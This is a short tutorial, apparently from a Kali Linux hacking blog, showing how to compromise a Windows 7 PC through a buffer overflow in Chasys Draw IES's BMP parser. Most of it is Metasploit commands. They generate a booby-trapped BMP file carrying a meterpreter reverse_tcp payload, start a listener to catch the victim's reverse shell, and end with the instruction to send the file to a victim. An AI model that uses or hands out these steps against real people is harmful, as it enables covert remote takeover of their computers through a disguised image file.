Categories

Archives

Kali Linux, Penetration Testing

Hack Remote Windows 7 PC using Chasys Draw IES Buffer Overflow

This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, whileparsing BMP files, where the ReadFile function is used to store user provided data on the  stack in a insecure way. It results in arbitrary code execution under thecontext of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7SP1.

Exploit Targets

Chasys Draw IES 4.10.01

Requirement

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/chasys_draw_ies_bmp_bof

msf exploit (chasys_draw_ies_bmp_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (chasys_draw_ies_bmp_bof)>set lhost 192.168.1.137 (IP of Local Host)

msf exploit (chasys_draw_ies_bmp_bof)>exploit

After we successfully generate the malicious bmp File, it will stored on your local computer

/root/.msf4/local/msf.bmp

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.137

exploit

Now send your msf.bmp files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.